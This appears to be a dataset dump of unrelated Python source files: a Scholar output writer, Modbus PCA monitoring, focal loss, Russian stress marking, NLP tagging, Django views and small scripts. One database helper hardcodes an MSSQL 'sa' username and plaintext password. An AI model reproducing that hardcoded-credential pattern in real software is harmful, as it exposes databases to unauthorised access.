citations.append(citation_delim)
#time.sleep(delay)
print citations
import re
# make a new text file with the output
header = 'title|url|year|num_citations|num_versions|cluster_id|url_pdf|url_citations|url_versions|url_citation|excerpt \n'
with open('/Users/ethan/Desktop/scholar_output.csv', 'a+') as newfile:
newfile.write(header)
newfile.close()
temp = citations
tot = len(temp)
for s,val in enumerate(temp):
newline = ''.join(val)
newline = newline[0:-2]
newline = re.sub('Title ', '', newline)
newline = re.sub('URL ', '', newline)
newline = re.sub('Year ', '', newline)
newline = re.sub('Citations ', '', newline)
newline = re.sub('Versions ', '', newline)
newline = re.sub('Versions list ', '', newline)
newline = re.sub('Excerpt Objectives ', '', newline)
newline = re.sub('Cluster ID ', '', newline)
newline = re.sub('Excerpt ', '', newline)
newline = re.sub('list ', '', newline)
newline = str(newline) + '\n'
print newline
with open('/Users/ethan/Desktop/scholar_output.csv', 'a+') as newfile:
newfile.write(newline)
newfile.close()
count = str(s+1)
print count + ' of ' + str(tot)
print 'All done!' |
9,277 | 17781ae5e9c72232fbc11c7eda7daeaeb0fa3670 | from .models import CNNClassifier, load_weights, LastLayer_Alexnet, classes, MyResNet
from .transforms import image_transforms, tensor_transform
from .utils import newest_model, Dataset, load_data
|
9,278 | 91cef72962332e7efcc86f1b19da4382bd72a466 | import subprocess
import re
class Command:
InputSize = 1
OutputSize = 2
MultiThreadable = True
ShareResources = False
def __init__(self, bin, config, showerr=False):
self.travatar = subprocess.Popen([bin, "-config_file", config, "-trace_out", "STDOUT", "-in_format", "egret", "-buffer", "false"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None if showerr else subprocess.PIPE, universal_newlines=True)
self.span_reg = re.compile(r"\[([0-9]+), ([0-9]+)\]")
def routine(self, instream):
egret_tree = instream[0]
if not egret_tree.startswith("success\n"):
return (egret_tree, "",)
egret_tree = egret_tree[8:]
self.travatar.stdin.write(egret_tree)
self.travatar.stdin.flush()
travatar_trace = self.travatar.stdout.readline()
spltrace = travatar_trace.split(" ||| ")
m = self.span_reg.match(spltrace[1])
inputlen = int(m.group(2))
while True:
travatar_trace_line = self.travatar.stdout.readline()
spltrace = travatar_trace_line.split(" ||| ")
spltree = spltrace[2].split(" ")
for x in spltree:
if x and x[0] == x[-1] == "\"":
inputlen -= 1
spltrace[4] = ".\n"
travatar_trace += " ||| ".join(spltrace)
if not inputlen:
break
travatar_output = self.travatar.stdout.readline().rstrip("\n")
return ("success\n" + travatar_output + "\n" + travatar_trace, travatar_output,)
|
9,279 | 572a9da5edcff3ff5ca0a37f982432f9712dc58c | #!/usr/bin/python
#MTU Server
from config import *
from pymodbus.client.sync import ModbusTcpClient
import time
import numpy as np
import logging
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.animation as anim
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
opc1_client = ModbusTcpClient(OPC1_IP, OPC1_PORT)
opc1_client.connect()
opc2_client = ModbusTcpClient(OPC2_IP, OPC2_PORT)
opc2_client.connect()
t = time.time()
Data = []
pca = PCA(n_components = 3)
Data = np.load("data.npy")
pca.fit(Data)
print "PCA Built"
t = time.time()
i = 0
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
y = []
def update(i):
#Read registers from the specific zone
l1 = float(opc1_client.read_holding_registers(L1, 1).registers[0])
l2 = float(opc2_client.read_holding_registers(L2, 1).registers[0])
t1 = float(opc1_client.read_holding_registers(T1, 1).registers[0])
t2 = float(opc2_client.read_holding_registers(T2, 1).registers[0])
v1 = opc2_client.read_holding_registers(V1, 1).registers[0]
v2 = opc1_client.read_holding_registers(V2, 1).registers[0]
p = opc2_client.read_holding_registers( P, 1).registers[0]
f1 = opc2_client.read_holding_registers(F1, 1).registers[0]
f2 = opc1_client.read_holding_registers(F2, 1).registers[0]
f3 = opc2_client.read_holding_registers(F3, 1).registers[0]
h = opc1_client.read_holding_registers( H, 1).registers[0]
v = np.array([[l1, l2, t1, t2, v1, v2, p, f1, f2, f3, h]])
v_transform = pca.transform(v)
y.append(v_transform[0])
x = range(len(y))
ax.clear()
ax.set_title("PCA Based Detection (Top 3 Scores).")
ax.set_ylabel("Top 3 scores")
ax.set_xlabel("Evaluation Points")
ax.set_xlim([0, 1.5*len(y)])
ax.plot(x, y, "x")
print "Simulation will start when the time is 0, 25, 50 ,75"
to = 0
while 1:
toot = int(time.time())%100
if to == toot - 1:
print toot
to = toot
# print to
if to == 0 or to == 25 or to == 50 or to == 75:
break
a = anim.FuncAnimation(fig, update, frames=int(SIM_TIME/SIM_STEP), interval=int(1000*SIM_STEP), repeat=False)
plt.show() |
9,280 | 9e9303d58c7e091bf7432060fad292c16ecf85ee | import torch
import torch.nn as nn
from torch.nn import functional as F
class FocalLoss1(nn.Module):
def __init__(self, alpha=0.25, gamma=2, reduction='mean', ignore_lb=255):
super().__init__()
self.alpha = alpha
self.gamma = gamma
self.reduction = reduction
self.ignore_lb = ignore_lb
def forward(self, logits, label):
"""[summary]
Args:
logits ([type]): tensor of shape (N, C, H, W)
label ([type]): tensor of shape(N, H, W)
Returns:
[type]: [description]
"""
# overcome ignored label
ignore = label.data.cpu() == self.ignore_lb
n_valid = (ignore == 0).sum()
label[ignore] = 0
ignore = ignore.nonzero()
_, M = ignore.size()
a, *b = ignore.chunk(M, dim=1)
mask = torch.ones_like(logits)
mask[[a, torch.arange(mask.size(1)), *b]] = 0
# compute loss
probs = torch.sigmoid(logits)
lb_one_hot = logits.data.clone().zero_().scatter_(1, label.unsqueeze(1), 1)
pt = torch.where(lb_one_hot == 1, probs, 1 - probs)
alpha = self.alpha * lb_one_hot + (1 - self.alpha) * (1 - lb_one_hot)
loss = -alpha * ((1 - pt)**self.gamma) * torch.log(pt + 1e-12)
loss[mask == 0] = 0
if self.reduction == 'mean':
loss = loss.sum(dim=1).sum() / n_valid
return loss
class FocalLoss(nn.Module):
"""https://www.kaggle.com/c/human-protein-atlas-image-classification/discussion/78109"""
def __init__(self, gamma=2):
super().__init__()
self.gamma = gamma
def forward(self, logit, target):
target = target.float()
max_val = (-logit).clamp(min=0)
loss = logit - logit * target + max_val + ((-max_val).exp() + (-logit - max_val).exp()).log()
invprobs = F.logsigmoid(-logit * (target * 2.0 - 1.0))
loss = (invprobs * self.gamma).exp() * loss
loss = loss.sum(dim=1) if len(loss.size()) == 2 else loss
return loss.mean()
|
9,281 | ed85cb61f4bc8bf758dafb10ffbabf87fb4521d0 | #!/usr/bin/env python
import sys
total = 0
for line in sys.stdin:
edges = [int(x) for x in line.split("x")]
edges.sort()
ribbon = sum(x * 2 for x in edges[:2])
l, w, h = edges
bow = l * w * h
total += bow + ribbon
print(total)
|
9,282 | aac9960dafc9e8d3a5670251fcc54eb8e34d4458 | from multiprocessing import Process, Pipe
from time import sleep
from os import getpid
def ponger(pipe, response):
while True:
msg = pipe.recv()
print(f"{getpid()} receiving: {msg}")
sleep(1)
pipe.send(response)
if __name__ == '__main__':
ping_conn, pong_conn = Pipe()
Process(target=ponger, args=(ping_conn, 'ping')).start()
Process(target=ponger, args=(pong_conn, 'pong')).start()
ping_conn.send('ping')
|
9,283 | 1bf9785135f6105301d02602e54cbbcbdd249144 | import re, os, nltk, pymorphy2, sys
from suffix_trees.STree import STree
def make_rules(folder):
rules_dictionary = {}
try:
path = os.path.join(os.getcwd(), 'rules', 'data', folder)
files = os.listdir(path)
except:
path = os.path.join(os.getcwd(), 'data', folder)
files = os.listdir(path)
short_files_rule = re.compile('.txt')
for file in files:
if short_files_rule.search(file) != None:
class_name = re.sub('_', ' ', re.sub('\.txt', '', file))
current_file = open(os.path.join(path, file), 'r', encoding='utf-8').read()
affixes = current_file.split(', ')
rules_dictionary[class_name] = affixes
return(rules_dictionary)
def find_affixes(rules_noun, lemma, word_possible_stress):
for stress_type, affixes in rules_noun.items():
for affix in affixes:
affix_type = ''
if re.search('^[а-яё]+\-$', affix) != None:
regexp = '^'+affix[:-1]
affix_type = 'preffix'
elif re.search('^\-[а-яё]+$', affix) != None:
regexp = affix[1:]+'$'
affix_type = 'suffix'
elif re.search('^[а-яё]+\-\.\.\.\-[а-яё]+$', affix) != None:
regexp = '^'+re.sub('\-\.\.\.\-', '.+', affix)+'$'
affix_type = 'combination'
if re.search(regexp, lemma) != None:
if stress_type in word_possible_stress:
word_possible_stress[stress_type].append((affix, affix_type))
else:
word_possible_stress[stress_type] = [(affix, affix_type)]
return(word_possible_stress)
def find_biggest_affixes(word_possible_stress):
biggest_len_suffix, biggest_len_prefix = 0, 0
biggest_suffix, biggest_prefix = '', ''
if 'all suffixes' in word_possible_stress:
for suffix in word_possible_stress['all suffixes']:
if len(suffix[0]) > biggest_len_suffix:
biggest_suffix = suffix[0]
biggest_len_suffix = len(suffix[0])
del word_possible_stress['all suffixes']
if 'all prefixes' in word_possible_stress:
for prefix in word_possible_stress['all prefixes']:
if len(prefix[0]) > biggest_len_prefix:
biggest_prefix = prefix[0]
biggest_len_prefix = len(prefix[0])
del word_possible_stress['all prefixes']
return(biggest_prefix, biggest_suffix, word_possible_stress)
def find_possible_types(word_possible_stress, biggest_suffix, biggest_prefix):
possible_types = []
for stress_type, affixes in word_possible_stress.items():
for affix in affixes:
if affix[1] == 'suffix':
if affix[0] == biggest_suffix:
possible_types.append(stress_type)
elif affix[1] == 'prefix':
if affix[0] == biggest_prefix:
possible_types.append(stress_type)
elif affix[1] == 'combination':
possible_types = []
pair = affix[0].split('...')
if pair[0] == biggest_prefix and pair[1] == biggest_suffix:
possible_types.append(stress_type)
return(possible_types)
def make_stressed_word(possible_types, token, lemma, biggest_suffix, original_token):
if possible_types[0] == 'prefix' or possible_types[0] == 'first vowel':
stressed_word = re.sub('^([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ])', '\g<1>\'', token)
#print(token, stressed_word, lemma, biggest_prefix, biggest_suffix)
elif possible_types[0] == 'suffix' or possible_types[0] == 'suffix 1':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'[^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ])', '\g<1>\'', token)
elif possible_types[0] == 'suffix 2':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ]){2})', '\g<1>\'', token)
elif possible_types[0] == 'suffix 3':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ]){3})', '\g<1>\'', token)
elif possible_types[0] == 'presuffix':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
suffixes = re.sub(stem_cutted, '', stem)
stressed_word = re.sub('([уеыаоэяиюёУЕЫАОЭЯИЮЁ])([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*'+suffixes+'.{,5})$', '\g<1>\'\g<2>', token)
elif possible_types[0] == 'type B':
stressed_word = re.sub('^(.+[уеыаоэяиюё])([^уеыаоэяиюё]*)$', '\g<1>\'\g<2>', token)
try:
parts = stressed_word.split('\'')
stressed_word = original_token[:len(parts[0])]+'\''+original_token[len(parts[0]):]
except:
stressed_word = original_token
return(stressed_word)
def process_stresses(part_of_speech, rules, pos, lemma, token, original_token, word_possible_stress, current_file):
stressed_word, biggest_suffix, possible_types = '', '', ['']
if part_of_speech in pos:
word_possible_stress = find_affixes(rules, lemma, word_possible_stress)
if word_possible_stress != {} and list(word_possible_stress.keys()) != ['all prefixes', 'all suffixes'] and \
list(word_possible_stress.keys()) != ['all suffixes'] and list(word_possible_stress.keys()) != ['all prefixes']:
biggest_prefix, biggest_suffix, word_possible_stress = find_biggest_affixes(word_possible_stress)
possible_types = find_possible_types(word_possible_stress, biggest_suffix, biggest_prefix)
if len(possible_types) == 1:
stressed_word = make_stressed_word(possible_types, token, lemma, biggest_suffix, original_token)
current_file = re.sub(original_token, stressed_word, current_file)
## if pos == 'VERB':
## print(pos, lemma, token, stressed_word, biggest_suffix, possible_types[0])
if possible_types == []: possible_types = ['']
return(current_file, stressed_word, biggest_suffix, possible_types[0])
def initialize(current_file):
morph = pymorphy2.MorphAnalyzer()
rules_noun = make_rules('NOUN')
rules_adj = make_rules('ADJ')
rules_verb = make_rules('VERB')
all_tokens = nltk.word_tokenize(current_file)
stressed_words, biggest_suffixes, stress_types, poses = [], [], [], []
for token in all_tokens:
stressed_word, biggest_suffix, stress_type = token, '', ''
original_token = token
token = token.lower()
word_possible_stress = {}
if re.search('^[А-ЯЁа-яё\-]+$', token) != None and token != '-':
token = re.sub('^-', '', token)
pos = morph.parse(token)[0].tag.POS
#pos = nltk.pos_tag(token, lang='rus')
lemma = morph.parse(token)[0].normal_form
if pos != None:
current_file, stressed_word, biggest_suffix, stress_type = process_stresses('NOUN', rules_noun, pos, lemma, token, original_token, word_possible_stress, current_file)
if biggest_suffix == '':
current_file,stressed_word, biggest_suffix, stress_type = process_stresses('ADJF', rules_adj, pos, lemma, token, original_token, word_possible_stress, current_file)
if biggest_suffix == '':
current_file, stressed_word, biggest_suffix, stress_type = process_stresses('VERB', rules_verb, pos, lemma, token, original_token, word_possible_stress, current_file)
if stressed_word == '':
stressed_word = original_token
stressed_words.append(stressed_word)
biggest_suffixes.append(biggest_suffix)
stress_types.append(stress_type)
poses.append(pos)
return(current_file, stressed_words, biggest_suffixes, stress_types, poses)
|
9,284 | 81fa3129d971fe8296a89a7b772d61ff50a8b9f7 | from game import BaseGame
class First(BaseGame):
key = 'F'
code = 'FIRST'
short_description = 'Vinci se esce 1 o 2. x2.8'
long_description = (
'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'
' puntato.')
min_bet = 20
multiplier = 2.8
def has_won(self, draws):
return draws[0] in (1, 2)
|
9,285 | 866571341a587c8b1b25437f5815429875bbe5ad | import thread
import time
import ctypes
lib = ctypes.CDLL('/home/ubuntu/workspace/35SmartPy/CAN/brain/CANlib.so')
init = lib.init
read = lib.readGun
read.restype = ctypes.POINTER(ctypes.c_ubyte * 8)
send = lib.sendBrake
init()
|
9,286 | 80b8b77498f915a85185f829e8c7d5becdab8068 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from .document import ParsedDocument,XmlDocument
from .corenlp import StanfordCoreNLP
from .annotation import KBPAnnMgr,ApfAnnMgr
import os
import codecs
import sys
from . import _list_files
def _sequence_tag_bio(doc):
outlines = u''
mentions= doc._annotate
sentences = doc._text_spans
for id,sentence in enumerate(sentences):
tokens= sentence['tokens']
tok_num = len(tokens)
mention_tags = ['O']* tok_num
coref_tags = ['-']*tok_num
for mention in mentions:
if mention['sent_id'] != id:
continue
mention_tokens= mention['mention_tokens']
md_tag = mention['md_tag']
coref_tag = mention['coref_tag']
tokids=[]
for token in mention_tokens:
(sent, tok) = [int(d) for d in token.split('_')]
if sent != id:
print 'mention cross sentence at {}'.format(sentence['origin_text'])
continue
tokids.append(tok)
for pos,tokid in enumerate(tokids):
curr_md = md_tag
curr_coref = coref_tag
if pos ==0:
curr_md = 'B-' + curr_md
else:
curr_md = 'I-' +curr_md
if pos == 0:
curr_coref = '(' + curr_coref
if pos == len(tokids) -1:
curr_coref = curr_coref + ')'
if pos > 0 and pos < len(tokids) -1:
curr_coref = '-'
if mention_tags[tokid] == 'O':
mention_tags[tokid] = curr_md
coref_tags[tokid]= curr_coref
source =[]
target =[]
for token,mention,coref in zip(tokens,mention_tags, coref_tags):
token_feature= [token['word_lower'].replace(u'#',u'@'), token['word'].replace(u'#',u'@'),
token['caps'].replace(u'#',u'@'), token['pos'].replace(u'#',u'@'),
token['ner'].replace(u'#',u'@')]
if token.has_key(u'comb-word'):
token_feature.append( token[u'comb-word'].replace(u'#',u'@'))
source.append('#'.join(token_feature))
target.append(mention)
source = u' '.join(source)
target = u' '.join(target)
outlines += u'{}|||{} </s>\n'.format(source,target)
return outlines
def build_tree_tag(mentions, tok_num):
mentions.sort(cmp = lambda x,y:cmp(x[0], y[0]))
tag_out=[('X',[],[]) for i in range(tok_num)]
for mention in mentions:
(start,end, mtype)= mention
tag_out[start][1].append('('+mtype)
tag_out[end][2].append(')'+mtype)
otags=[]
for tag in tag_out:
pre= ' '.join(tag[1]).strip()
suc =' '.join(tag[2][::-1]).strip()
if pre != '':
otags.append(pre)
otags.append(tag[0])
if suc != '':
otags.append(suc)
otags= ' '.join(otags)
max_tag_num = max([len(x[1]) for x in tag_out])
if max_tag_num >1:
print 'nested tag:{}'.format(otags)
return otags
def _sequence_tag_x(doc):
outlines = u''
mentions= doc._annotate
sentences = doc._text_spans
for id,sentence in enumerate(sentences):
tokens= sentence['tokens']
tok_num = len(tokens)
curr_mentions = []
for mention in mentions:
if mention['sent_id'] != id:
continue
mention_tokens= mention['mention_tokens']
md_tag = mention['md_tag']
tok_start= int(mention_tokens[0].split('_')[1])
tok_end = int(mention_tokens[-1].split('_')[1])
curr_mentions.append((tok_start,tok_end, md_tag))
target =build_tree_tag(curr_mentions, tok_num)
source =[]
for token in tokens:
token_feature= [token['word_lower'].replace(u'#',u'@'), token['word'].replace(u'#',u'@'),
token['caps'].replace(u'#',u'@'), token['pos'].replace(u'#',u'@'),
token['ner'].replace(u'#',u'@')]
if token.has_key(u'comb-word'):
token_feature.append( token[u'comb-word'].replace(u'#',u'@'))
source.append('#'.join(token_feature))
source = u' '.join(source)
outlines += u'{}|||{} </s>\n'.format(source,target.decode('utf-8'))
return outlines
#in format 'BIO' will ignore all nested tags,in format 'XX' will build tree sequence
def gen_sequence_tags(json_dir, outfile, fmt='BIO', encoding = 'utf-8'):
fout= codecs.open(outfile, 'w', encoding= encoding)
seqtag_func= None
if fmt == 'BIO':
seqtag_func= _sequence_tag_bio
elif fmt =='XX':
seqtag_func= _sequence_tag_x
else:
print 'unknown format {}'.format(fmt)
return
files = _list_files(json_dir, '.json')
for f in files:
print 'processing {}'.format(f)
doc = ParsedDocument()
doc.load(f)
outlines = seqtag_func(doc)
fout.write(outlines)
fout.flush()
fout.close()
|
9,287 | 8efee4ad16e938e85a500e5aebf5154b5708b277 | from graph import Graph
import ast
import itertools
def add_nodes(g):
nodes = ['a', 'b', 'c', 'd']
for n in nodes:
g.add_node(n)
def add_desc(g):
desc = [('b', 'a'), ('b', 'c'), ('d', 'c')]
for d in desc:
g.add_desc(d)
def add_edges(g):
edges = [('b', 'a'), ('b', 'c'), ('d', 'c')]
for e in edges:
g.add_edge(e)
def read_all_paths(n):
all_paths = {}
with open(n+'.txt', 'r') as infile:
for line in infile:
path = ast.literal_eval(line)
if path:
dest = path[-1][0]
if dest in all_paths:
all_paths[dest].append(path)
else:
all_paths[dest] = [path]
return all_paths
def is_blocked(path, obs_dict, g):
prev_edge = []
for cur_edge in path:
# try to find blocking transitions - either non-observed v-structures, or observed regulars
if prev_edge:
prev_node, prev_dir = prev_edge
cur_node, cur_dir = cur_edge
if prev_dir == 1 and cur_dir == 0:
# V-structure
blocking_v = True
for n in g.nodes[prev_node].desc:
if obs_dict[n]:
blocking_v = False
if blocking_v:
return True
else:
# not V-structure
if obs_dict[prev_node]:
return True
prev_edge = cur_edge
return False
def is_indep(obs_dict, all_paths, g):
for path in all_paths:
block = is_blocked(path, obs_dict, g)
if block:
continue
else:
# we have found a non-blocked path, so indep does not hold
return False
return True
if __name__=='__main__':
g = Graph()
add_nodes(g)
add_edges(g)
add_desc(g)
g.print_all_edges()
g.print_all_descs()
for n in g.nodes.keys():
g.get_all_paths(n, n)
all_nodes = list(g.nodes.keys())
all_paths = {}
for n in all_nodes:
all_paths[n] = read_all_paths(n)
s = len(all_nodes)
obs_dict = {}
combs = list(itertools.product([0,1], repeat = s))
for c in combs:
for n, val in zip(all_nodes, c):
obs_dict[n] = val
for i, j in itertools.combinations(all_nodes, 2):
indep = is_indep(obs_dict, all_paths[i][j], g)
if indep:
observed = [all_nodes[idx] for idx, val in enumerate(c) if val]
if (not (i in observed)) and (not (j in observed)):
print(i, j, str(observed))
# print(i, j, str([all_nodes[idx] for idx, val in enumerate(c) if val]))
g.reset_files()
|
9,288 | 97b94f3388a6e2473d43e3c4c4e281a86a031dbb | #!/usr/bin/python
# -*- coding: UTF-8 -*-
def parse(node, array):
string = ''
string += "\t%s = ScrollView:create();\n" % node
if (array.get('IsBounceEnabled') != None and array['IsBounceEnabled']):
string += "\t%s:setBounceEnabled(true);\n" % node
if (array.get('InnerNodeSize') != None):
string += "\t%s:setInnerContainerSize({width = %.2f, height = %.2f});\n" % (node, array['InnerNodeSize']['Width'], array['InnerNodeSize']['Height'])
if (array['ScrollDirectionType'] == 'Horizontal'):
string += "\t%s:setDirection(0);\n" % node
elif (array['ScrollDirectionType'] == 'Vertical'):
string += "\t%s:setDirection(1);\n" % node
return string |
9,289 | 73058bd9533ef6c0d1a4faf96930077147631917 | # This script runs nightly to process users' preinstall history
# no it doesn't, you liar
from bson.objectid import ObjectId
import ConfigParser
import os
from text_processing.textprocessing import start_text_processing_queue
from pymongo import MongoClient
import time
from os import listdir
from os.path import isfile, join
CONFIG_FILENAME = 'app.config'
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
IMPORT_DIR = os.path.join(BASE_DIR, "static", "import")
# read in app config
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASE_DIR,CONFIG_FILENAME))
#DB
uri = "mongodb://"+ config.get('db','user')+ ":"+ config.get('db','pass')+"@" +config.get('db','host') + ":" + config.get('db','port')
db_client = MongoClient(uri)
db = db_client[config.get('db','name')]
db_user_history_collection = db[config.get('db','user_history_item_collection')]
db_user_collection = db[config.get('db','user_collection')]
#find users who have preinstall history
users = db_user_collection.find({ "history-pre-installation": {"$exists":1}, "history-pre-installation-processed": {"$exists":0} }, {"history-pre-installation":1, "_id":1, "username":1})
for user in users:
print "Processing browser history for " + user["username"]
historyItems = user["history-pre-installation"]
print str(len(historyItems)) + " items to process"
userID = str(user["_id"])
# start text queue for each item
for historyObject in historyItems:
print historyObject["url"]
historyObject["userID"] = userID;
historyObject["preinstallation"] = "true"
#check that we haven't already added this item
count = db_user_history_collection.find({ "userID" : userID, "url":historyObject["url"], "lastVisitTime": historyObject["lastVisitTime"] }).count()
if count == 0:
args = (historyObject, config, False);
start_text_processing_queue(*args)
else:
print "Already added this item - skipping..."
#mark that we've processed their browsing history
db_user_collection.update({ "_id": ObjectId(userID)},{ "$set":{'history-pre-installation-processed':1}}) |
9,290 | 051062a78d3f8b0caefd15f7a57a8500ddc019a6 | import unittest
from HTMLTestRunner import HTMLTestRunner
discover = unittest.defaultTestLoader.discover(start_dir='./',
pattern='test*.py',
top_level_dir=None)
f = open('report.html', 'wb+')
runner = HTMLTestRunner(stream=f,
title="web自动化",
description="自动化测试报告详情")
runner.run(discover)
f.close()
|
9,291 | 89518f43934710ef2e7471a91128e20d2306d6f6 | from django.shortcuts import render_to_response
from mousedb.animal.models import Animal, Strain
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.db import connection
import datetime
@login_required
def todo(request):
eartag_list = Animal.objects.filter(MouseID__isnull=True, Alive=True).order_by('Strain','Background','Rack','Cage')
genotype_list = Animal.objects.filter(Genotype="N.D.", Alive=True).exclude(Strain__Strain="C57BL/6").order_by('Strain','Background','Rack','Cage')
wean = datetime.date.today() - datetime.timedelta(days=30)
wean_list = Animal.objects.filter(Born__gt=wean).filter(Weaned=None,Alive=True).exclude(Strain=2).order_by('Strain','Background','Rack','Cage')
return render_to_response('todo.html', {'eartag_list':eartag_list, 'wean_list':wean_list, 'genotype_list':genotype_list},context_instance=RequestContext(request))
@login_required
def home(request):
cursor = connection.cursor()
cage_list = Animal.objects.values("Cage")
cage_list_current = Animal.objects.filter(Alive=True).values("Cage")
animal_list = Animal.objects.all()
animal_list_current = Animal.objects.filter(Alive=True)
strain_list = Strain.objects.all()
strain_list_current = Strain.objects.filter(animal__Alive=True)
return render_to_response('home.html', {'animal_list':animal_list, 'animal_list_current':animal_list_current, 'strain_list':strain_list, 'strain_list_current':strain_list_current, 'cage_list':cage_list, 'cage_list_current':cage_list_current},context_instance=RequestContext(request))
|
9,292 | 5d9ace3b6c5b4e24fc3b20b5e5640f2fcdb252bb | # Stubs for torch.nn.utils (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_
from .convert_parameters import parameters_to_vector, vector_to_parameters
from .spectral_norm import remove_spectral_norm, spectral_norm
from .weight_norm import remove_weight_norm, weight_norm
|
9,293 | b1fbc8f3616b70e5d35898fd895c37e838c87dc9 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 05:48:57 2019
@author: emama
"""
import datetime as dt
t = dt.datetime.today()
print(t) |
9,294 | 7d3d4476343579a7704c4c2b92fafd9fa5da5bfe | import socket
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientsocket.connect(('localhost', 9999))
clientsocket.send('hallooooo')
|
9,295 | 12dc248a95a84603065e23ce8fd33163bfcd2d3e | __author__ = 'gaa8664'
import pymssql
class Connection:
def __init__(self):
self.connection = pymssql.connect(server = 'gditsn033\SQLPROD', database='ProdigiousDB', user='sa', password='sgrh@2016')
def __enter__(self):
self.cursor = self.connection.cursor()
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
self.cursor.close()
self.connection.close() |
9,296 | 654adc9b77bbad6ba36dd42125e69e1a4ad1312d | import random
import time
import unittest
from math import radians
from maciErrType import CannotGetComponentEx
from DewarPositioner.positioner import Positioner, NotAllowedError
from DewarPositioner.cdbconf import CDBConf
from Acspy.Clients.SimpleClient import PySimpleClient
from DewarPositionerMockers.mock_components import MockDevice, MockSource
class PositionerOffsetTest(unittest.TestCase):
def setUp(self):
self.cdbconf = CDBConf()
self.p = Positioner(self.cdbconf)
self.source = MockSource()
try:
client = PySimpleClient()
self.device = client.getComponent('RECEIVERS/SRTKBandDerotator')
self.using_mock = False
print '\nWARNING -> using the real component'
except CannotGetComponentEx:
print '\nINFO -> component not available: we will use a mock device'
self.device = MockDevice()
self.using_mock = True
def tearDown(self):
self.p.park()
time.sleep(0.2)
def _test_set_get(self):
"""Verify the set and get methods"""
# Not allowed when the system is not yet configured
self.assertRaises(NotAllowedError, self.p.setOffset, 2)
self.p.setup(siteInfo={}, source=None, device=self.device)
self.p.setOffset(2)
self.assertEqual(self.p.getOffset(), 2)
self.assertEqual(self.p.getPosition(), 2)
self.p.clearOffset()
self.assertEqual(self.p.getOffset(), 0)
def _test_set_new_pos(self):
"""Vefify the setOffset set a new position."""
self.p.setup(siteInfo={}, source=None, device=self.device)
time.sleep(0.3) if self.using_mock else time.sleep(3)
act_position = self.device.getActPosition()
offset = 0.5
self.p.setOffset(offset)
time.sleep(0.3) if self.using_mock else time.sleep(3)
self.assertAlmostEqual(
self.p.getPosition(),
act_position + offset,
places=1
)
self.assertAlmostEqual(
act_position + offset,
self.device.getActPosition(),
places=1
)
def _test_out_of_range(self):
"""Cause a rewind in case the offset is out of range"""
self.cdbconf.setup('KKG')
self.cdbconf.setConfiguration('CUSTOM_OPT')
az, el, latitude = [radians(50)] * 3
site_info = {'latitude': latitude}
self.p.setup(site_info, self.source, self.device)
self.p.setRewindingMode('AUTO')
offset = 20
max_limit = self.device.getMaxLimit()
min_limit = self.device.getMinLimit()
Pis = max_limit - offset/2
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.p.setPosition(Pis)
time.sleep(0.2) # Wait a bit for the setup
max_rewinding_steps = (max_limit - min_limit) // self.device.getStep()
expected = Pis - max_rewinding_steps*self.device.getStep() + offset
self.source.setAzimuth(az)
self.source.setElevation(el)
self.p.startUpdating('MNG_TRACK', 'ANT_NORTH', az, el, None, None)
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.p.setOffset(offset)
time.sleep(0.2) if self.using_mock else time.sleep(3)
self.assertEqual(self.device.getActPosition(), expected)
if __name__ == '__main__':
unittest.main()
|
9,297 | 5fa9c9908d4aea507cf0ca8287a6b8e5b391470a | import configparser
import shutil
def get_imagemagick_path():
config = configparser.ConfigParser()
config.read("settings/settings.ini")
return config['commands'].get('convert', shutil.which("convert"))
# try:
# except KeyError:
# EXIV2_PATH = shutil.which("exiv2")
|
9,298 | 17f76c2b53b36c81cea7f7616859f5257790cd73 | #!/usr/bin/env python
from django.http import HttpResponse
try:
import simplejson as json
except ImportError:
import json
from api import *
def index(request):
data = parse_signed_request(request)
if not data.has_key('user_id'):
request_url = oauth_request_url()
return HttpResponse("<script>top.location.href='%s';</script>" % request_url)
return HttpResponse("Welcome %s" % data['user_id']) |
9,299 | a19616d448da057d5be0af841467a25baaacf5b3 | import numpy as np
from load_data import load_entity, load_candidates2, load_train_data
def predict_batch(test_data, model, batch_size=None):
result = model.predict(test_data, batch_size=batch_size)
return result
